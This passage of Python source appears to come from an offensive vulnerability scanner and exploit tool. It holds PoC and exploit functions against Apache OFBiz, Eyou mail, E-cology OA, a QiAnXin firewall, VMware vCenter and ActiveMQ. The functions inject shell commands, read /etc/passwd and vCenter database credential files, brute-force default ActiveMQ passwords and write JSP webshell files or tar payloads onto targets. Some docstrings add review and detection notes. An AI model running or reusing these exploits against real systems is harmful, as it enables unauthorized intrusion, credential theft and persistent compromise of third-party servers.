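                                timeout=self.timeout, verify=False)
        if r"cus-obj" in request.text:
            data = self.payload_cve_2021_26295_exp_2.replace("RECOMMAND", cmd_hex)
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            if request.status_code == 200:
                r = "Command Executed Successfully (But No Echo)"
            else:
                r = "Command Executed Failed... ..."
        else:
            # probe reply lacked the expected marker; report the probe exchange
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            r = "Command Executed Failed... ..."
        verify.exploit_print(r, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)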
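def cnvd_2021_26422_poc(self):
    """PoC for the Eyou email system command injection CNVD-2021-26422.

    Posts ``type='|echo <marker>||'`` to ``/webadm/?q=moni_detail.do&action=gragh`` and marks
    success when the marker is echoed back (after the ``misinformation()`` filter).
    ``verify.scan_print`` runs on every completed request; the lock is released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Eyou Email System: CNVD-2021-26422"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Eyou email system has remote command execution"
        self.vul_info["vul_numb"] = "CNVD-2021-26422"
        self.vul_info["vul_apps"] = "Eyou"
        self.vul_info["vul_date"] = "2021-04-19"
        self.vul_info["vul_vers"] = "unknow"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "RCE"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Eyou email system has remote command execution"
        self.vul_info["cre_date"] = "2021-04-29"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
        md = random_md5()
        cmd = "echo " + md
        payload = "type='|" + cmd + "||'"
        try:
            request = requests.post(url, data=payload, headers=self.headers,
                                    timeout=self.timeout, verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = payload
                self.vul_info["prt_info"] = "[cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()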
def time_2021_0515_exp(self, cmd):
    """POST ``self.payload_time_2021_0515`` to the E-cology ``WorkflowServiceXml`` endpoint with *cmd* in the ``cmd`` header and print the body."""
    vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
    target = urljoin(self.url, "/services%20/WorkflowServiceXml")
    request_headers = {
        'User-Agent': self.ua,
        'SOAPAction': '""',
        'cmd': cmd,
        "Content-Type": "text/xml;charset=UTF-8"
    }
    try:
        response = requests.post(target, data=self.payload_time_2021_0515,
                                 headers=request_headers, timeout=self.timeout,
                                 verify=False)
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
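def time_2021_0410_poc(self):
    """PoC for the QiAnXin NS-NGFW ``deleteImage`` RPC command injection (tracked here as time-2021-0410).

    Injects ``echo <marker>`` redirected to ``/var/www/html/<marker>.txt`` through the RPC,
    then GETs that file and marks success when the marker is present, the file name is not
    merely reflected, and the status is 200. ``verify.scan_print`` runs on every completed
    exchange.

    ``vul_numb`` now matches ``prt_name`` (it was ``time-2021-0415`` from a copied template);
    the lock is released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
        self.vul_info["vul_numb"] = "time-2021-0410"
        self.vul_info["vul_apps"] = "QiAnXin"
        self.vul_info["vul_date"] = "2021-04-10"
        self.vul_info["vul_vers"] = "unknow"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "RCE"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
        self.vul_info["cre_date"] = "2021-04-16"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/directdata/direct/router")
        md = random_md5()
        cmd = "echo " + md
        data = json.dumps({
            "action": "SSLVPN_Resource",
            "method": "deleteImage",
            "data": [{
                "data": [
                    "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md + ".txt"
                ]
            }],
            "type": "rpc",
            "tid": 17
        })
        try:
            request = requests.post(url, data=data, headers=self.headers,
                                    timeout=self.timeout, verify=False)
            url = urljoin(self.url, md + ".txt")
            req = requests.get(url, data="1", headers=self.headers,
                               timeout=self.timeout, verify=False)
            if md in misinformation(req.text, md) and (md + ".txt") not in req.text and req.status_code == 200:
                # vul_data records the RPC exchange, not the file fetch
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_info"] = "[rce:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()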
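def cve_2021_26295_poc(self):
    """PoC for Apache OFBiz CVE-2021-26295 (RMI deserialization) using a DNS callback.

    Hex-encodes a callback domain into ``self.payload_cve_2021_26295_poc``, posts it to
    ``/webtools/control/SOAPService`` and marks success when the lookup is observed.

    The callback now comes from the module's ``dns_request()``/``dns_result()`` helpers -- the
    same ones the Druid, Solr and vRealize PoCs in this file use -- instead of an inline copy
    of the dnslog.cn client that carried a hard-coded ``PHPSESSID`` cookie. A fixed session
    cookie is shared by every copy of the tool and is not under the operator's control, so
    callbacks could be observed by, or mixed with, anyone else using the same value.
    ``vul_apps`` now says OFBiz (it was "Flink"); the lock is released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution"
        self.vul_info["vul_numb"] = "CVE-2021-26295"
        self.vul_info["vul_apps"] = "OFBiz"
        self.vul_info["vul_date"] = "2021-03-25"
        self.vul_info["vul_vers"] = "< 17.12.06"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Arbitrary Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = ("Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。"
                                     "攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器.")
        self.vul_info["cre_date"] = "2021-03-31"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': 'text/xml',
            'Connection': 'close'
        }
        try:
            dns = dns_request()
            # the payload template expects the callback host as a lowercase hex byte string
            dns_hex = dns.encode("utf8").hex()
            data = self.payload_cve_2021_26295_poc.replace("RECOMMAND", dns_hex)
            url = urljoin(self.url, "/webtools/control/SOAPService")
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            # dns_result() truthiness is what the sibling PoCs rely on as well
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()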
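def time_2020_1013_poc(self):
    r"""PoC for the unauthenticated vCenter ``/eam/vib?id=`` arbitrary file read (no CVE assigned).

    Requests ``/etc/passwd`` first; when the reply does not look like a Linux passwd file it
    falls back to the Windows ``vcdb.properties`` path. Either hit fills ``self.vul_info`` and
    ``verify.scan_print`` runs in both cases.

    The Windows path is now a raw string: in the previous version it was a normal literal, so
    the two ``\v`` sequences (``\vmware-vpx``, ``\vcdb``) were sent as vertical-tab characters
    and the Windows check could never match. The Windows body check also looks for ``driver``
    where the old code had ``dirver``, which reads as a typo. The lock is released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取"
        self.vul_info["vul_numb"] = "time-2020-10-13"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2020-10-13"
        self.vul_info["vul_vers"] = "<= 6.5u1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件读取"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned."
        self.vul_info["cre_date"] = "2021-02-26"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close",
        }
        try:
            url = urljoin(self.url, "/eam/vib?id=/etc/passwd")
            res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text:
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = url
                self.vul_info[
                    "prt_info"] = "[file] [os:linux] [url:" + url + " ]"
            else:
                # raw string: "\v" in a normal literal is a vertical tab, which garbled this URL before
                url = urljoin(
                    self.url,
                    r"/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties"
                )
                res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
                # NOTE(review): "driver" replaces the old "dirver" check; confirm the key name
                # against a real vcdb.properties before relying on this branch
                if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"driver" in res.text:
                    self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = url
                    self.vul_info[
                        "prt_info"] = "[file] [os:windows] [url:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()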
def cve_2016_3088_poc(self) -> None:
    """Probe for Apache ActiveMQ CVE-2016-3088 (fileserver PUT + MOVE write).

    Fills ``self.vul_info`` with the advisory metadata, then:

    1. tries each ``user:pass`` entry of ``self.passlist`` as HTTP Basic auth against
       ``/admin/test/systemProperties.jsp`` and, on the first HTTP 200, extracts the
       ``activemq.home`` value from the page into ``self.path``;
    2. ``PUT``s a random marker (``self.poc``) to ``/fileserver/v.txt``;
    3. sends a ``MOVE`` with a ``file://`` ``Destination`` under ``<path>/webapps/api``;
    4. ``GET``s ``/api/<name>.jsp`` and reports ``PoCSuCCeSS`` if the marker is echoed.

    ``verify.scan_print`` is called in both the success and the no-match case; timeouts,
    connection errors and any other exception go to the matching ``verify.*_print``
    helper and are swallowed. Returns nothing.

    Side effects: holds ``self.threadLock`` for the whole method; sets many instance
    attributes (``path``, ``name``, ``webshell``, ``poc``, ``exp``, ``passlist``, ``pa``,
    ``base64_p``, ``p``, ``headers_base64``, ``headers_move``, ``request``, ``rawdata``);
    this check is not passive -- it writes ``v.txt`` (and, if the MOVE succeeds, a
    ``.jsp`` file) on the target and does not remove them afterwards.

    Detection note: the server-side indicators are a ``PUT`` to ``/fileserver/`` followed
    by a ``MOVE`` whose ``Destination`` header is a ``file://`` URI, and a burst of
    Basic-auth attempts against ``/admin/``.
    """
    self.threadLock.acquire()
    # Advisory metadata reported verbatim by verify.scan_print.
    self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2016-3088"
    self.vul_info["vul_apps"] = "AcitveMQ"
    self.vul_info["vul_date"] = "2016-03-10"
    self.vul_info["vul_vers"] = "< 5.14.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
    self.vul_info["cre_date"] = "2021-01-07"
    self.vul_info["cre_auth"] = "zhzyker"
    self.rawdata = None  # assigned but not read anywhere in this method
    self.path = "null"  # stays "null" if no credential yields a 200 / no activemq.home match
    self.name = random_md5()[:-20]
    self.webshell = "/" + self.name + ".jsp"
    self.poc = random_md5()  # random marker; its presence in the final GET is the success test
    self.exp = self.jsp_webshell  # assigned but not used by this PoC (the PUT body is self.poc)
    self.passlist = [
        "admin:123456",
        "admin:admin",
        "admin:123123",
        "admin:activemq",
        "admin:12345678"
    ]
    try:
        try:
            # Loop variable is an instance attribute, so self.pa / self.headers_base64
            # keep the last credential tried (used by the requests below).
            for self.pa in self.passlist:
                self.base64_p = base64.b64encode(str.encode(self.pa))
                self.p = self.base64_p.decode('utf-8')
                self.headers_base64 = {
                    'User-Agent': self.ua,
                    'Authorization': 'Basic ' + self.p
                }
                url = urljoin(self.url, "/admin/test/systemProperties.jsp")
                self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False)
                if self.request.status_code == 200:
                    # [0] raises IndexError when the page has no activemq.home row.
                    self.path = re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                    break
        except IndexError:
            # A 200 page without the expected row: continue with self.path == "null".
            pass
        # Upload the marker, then ask the server to move it into the webapps directory.
        # Both requests are sent even when no credential matched above.
        self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.poc, timeout=self.timeout, verify=False)
        self.headers_move = {
            'User-Agent': self.ua,
            'Destination': 'file://' + self.path + '/webapps/api' + self.webshell
        }
        self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False)
        self.request = requests.get(self.url + "/api" + self.webshell, headers=self.headers_base64, timeout=self.timeout, verify=False)
        if self.poc in self.request.text:
            # Evidence: dump of the final GET that echoed the marker.
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
            # self.pa is the last credential tried, which is the matching one only if the
            # loop above hit a 200 before exhausting the list.
            self.vul_info["prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        # Broad catch: any other failure is reported via error_print and swallowed.
        verify.error_print(self.vul_info["prt_name"])
    # NOTE(review): release is not in a ``finally``; if one of the verify.*_print
    # helpers above raises, the lock stays held for the rest of the process.
    self.threadLock.release()
def cve_2021_21972_poc(self) -> None:
    """Probe for VMware vCenter CVE-2021-21972 (unauthenticated upload via vROps plugin).

    Fills ``self.vul_info`` with the advisory metadata and sends a ``GET`` to
    ``/ui/vropspluginui/rest/services/uploadova``. An HTTP 405 is treated as
    "endpoint present" (``prt_resu = "PoC_MaYbE"``); the method then POSTs a tar
    archive from the tool's local ``payload/payload/`` directory (Linux variant first,
    Windows variant if the Linux check fails) and fetches ``/ui/resources/vvvvvv.txt``;
    the literal ``"upload"`` in that response upgrades the result to ``"PoCSuCCeSS"``.
    ``verify.scan_print`` receives the result; timeouts, connection errors and any other
    exception go to the matching ``verify.*_print`` helper and are swallowed.
    Returns nothing.

    Side effects: holds ``self.threadLock`` for the whole method; overwrites
    ``self.vul_info``; this check is not passive -- on a 405 it writes files to the
    target and does not remove them. The tar paths are resolved relative to
    ``sys.argv[0]``, so the tool must be launched from its own checkout.

    Detection note: server-side indicators are a multipart ``POST`` to
    ``/ui/vropspluginui/rest/services/uploadova`` followed by a ``GET`` for
    ``/ui/resources/vvvvvv.txt``.
    """
    self.threadLock.acquire()
    # Advisory metadata reported verbatim by verify.scan_print.
    self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传"
    self.vul_info["vul_numb"] = "CVE-2021-21972"
    self.vul_info["vul_apps"] = "Vmware"
    self.vul_info["vul_date"] = "2021-02-24"
    self.vul_info["vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件上传"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)"
    self.vul_info["cre_date"] = "2021-02-25"
    self.vul_info["cre_auth"] = "zhzyker"
    headers = {
        "User-agent": self.ua,
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        # Presence check only: a 405 (method not allowed) for GET is read as "the
        # upload endpoint exists", not as proof of vulnerability.
        url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
        res = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
        if res.status_code == 405:
            self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoC_MaYbE"
            self.vul_info["vul_payd"] = url
            self.vul_info["prt_info"] = "[upload] [url:" + url + " ]"
            # Rebinds ``headers``: the upload requests use this set, which drops the
            # Content-Type above (requests builds the multipart one itself).
            headers = {
                "User-Agent": self.ua,
                "Accept": "*/*",
                "Connection": "close"
            }
            # Payload archives are located relative to the running script, not the CWD.
            path = os.path.split(os.path.realpath(sys.argv[0]))[0]
            linux_tar = path + "/payload/payload/cve202121972_linux.tar"
            # NOTE(review): the handle from open() is never closed (no ``with``); a
            # missing file raises here and lands in the generic ``except Exception``
            # below, which skips verify.scan_print entirely.
            file = {'uploadFile': open(linux_tar, 'rb')}
            url = urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
            r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False)
            # ``url`` is rebound to the check URL here, so the prt_info strings below
            # record /ui/resources/vvvvvv.txt, not the upload endpoint.
            url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt")
            req = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
            if r"upload" in req.text:
                # Evidence is the dump of the POST (``r``), not of the verification GET.
                self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = linux_tar  # local path of the archive that was sent
                self.vul_info["prt_info"] = "[upload] [os:linux] [url:" + url + " ]"
            else:
                # Same sequence with the Windows archive; same unclosed-handle caveat.
                windows_tar = path + "/payload/payload/cve202121972_windows.tar"
                file = {'uploadFile': open(windows_tar, 'rb')}
                url = requests.compat.urljoin(self.url, "/ui/vropspluginui/rest/services/uploadova")
                r = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False)
                url = requests.compat.urljoin(self.url, "/ui/resources/vvvvvv.txt")
                req = requests.get(url, headers=headers, timeout=self.timeout, verify=False)
                if r"upload" in req.text:
                    self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = windows_tar
                    self.vul_info["prt_info"] = "[upload] [os:windows] [url:" + url + " ]"
        # Printed for every outcome that reaches here, including the non-405 case
        # where prt_resu is still "null".
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        # Broad catch: any other failure (including a missing payload file) is reported
        # via error_print and swallowed.
        verify.error_print(self.vul_info["prt_name"])
    # NOTE(review): release is not in a ``finally``; if one of the verify.*_print
    # helpers above raises, the lock stays held for the rest of the process.
    self.threadLock.release()